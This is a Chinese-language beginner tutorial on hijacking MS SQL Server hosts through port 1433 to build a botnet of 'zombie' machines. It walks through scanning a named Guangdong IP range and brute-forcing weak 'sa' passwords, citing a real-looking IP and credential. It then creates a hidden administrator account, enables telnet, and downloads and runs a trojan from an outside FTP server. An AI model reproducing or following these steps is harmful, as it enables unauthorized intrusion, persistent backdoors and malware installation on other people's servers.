可能在做的批量抓1433的肉鸡大家不怎么什么原理。也不知道是什么过程。
所以今天我就做个菜鸟级的1433教程。一步一步教菜菜们抓鸡!
-------------------------------------------------------------------------------------------------------------------
第一步:选一个IP段扫1433开放端口
我用的是星碟扫描器(工具只要能扫就可以)IP段是广东的203.86.0.0-203.86.255.254

第二步:扫1433弱口令 用到工具X-scan
打开X-scan点设置-扫描参数-文件获取主机列表-然后选择刚才扫的开放1433的IP
在全局设置的扫描模块里只钩上SQL弱口令。然后确定开始扫描

等他慢慢扫后就会陆续出来上图的弱口令漏洞了
第三步:用SQL连接器连接并提权开telnet服务
我们选择下面IP进行入侵
[203.86.28.141]: 发现SQL-Server弱口令 "sa/00000000" (203.86.28.141:1433)
首先用SQL连接器连接

连接成功。在DOS下输入命令
net user jiang$ ************* /add (****这个自己定义。相信大家也知道是什么)
net localgroup administrators jiang$ /add
然后就是开telnet了输入命令:net start telnet

OK`成功开启telnet了现在我们用刚才建立的超级用户进行连接

OK拿下CMDSHELL了
第四步:利用FTP上传自己的木马
输入命令:ftp go1.icpcn.com (go1.icpcn.com是你的FTP服务器)
然后输入账号密码进入自己的FTP。
然后就是下载自己的木马了输入命令:get 木马.exe
下完后打命令bye退出FTP。然后运行我们的木马。直接输入命令:木马.exe

下面我们就等肉鸡上线了`赫赫`上来了